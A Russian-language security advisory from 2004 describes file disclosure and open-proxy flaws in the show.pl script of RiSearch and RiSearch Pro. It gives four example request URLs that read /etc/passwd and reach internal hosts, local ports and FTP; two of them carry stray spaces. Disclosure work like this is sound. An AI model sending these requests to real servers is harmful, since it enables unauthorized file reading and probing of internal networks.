Удаленный неавторизованный доступ в RiSearch и RiSearch Pro

Дата публикации:
29.07.2004
Всего просмотров:
1468
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
RiSearch 1.x
RiSearch Pro 3.x
Уязвимые версии: RiSearch/RiSearch Pro 1.0.01, 3.2.06

Описание: Несколько уязвимостей обнаружено в RiSearch и RiSearch Pro в 'show.pl'. Удаленный пользователь может получить файлы на целевой системе, которые расположены вне Web каталога. Удаленный пользователь может также использовать поисковый движок как открытый прокси, чтобы подключится к портам на произвольных системах.

1. Просмотр произвольных файлов:

 http://10.0.0.0/cgi-bin/search/show.pl?url=file:/etc/passwd
2. Доступ к сайтам в локальной сети:
http://10.0.0.0/cgi-bin/search/show.pl?url=http://192.168.0.1
3. Доступ к другим портам через HTTP протокол:
 http://10.0.0.0/cgi-bin/search/sho w.pl?url=http://localhost:8080
4. Доступ к FTP:
http://10.0.0.0/cgi-bin/search/show.pl?url=ftp://192.1 68.0.1

URL производителя:http://www.risearch.org/

Решение:Установите обновленную версию программы.

Ссылки: IRM 009: RiSearch and RiSearch ProPro are vulnerable to open FTP/HTTP proxy, directory listings and file disclosure vulnerabilities

или введите имя

CAPTCHA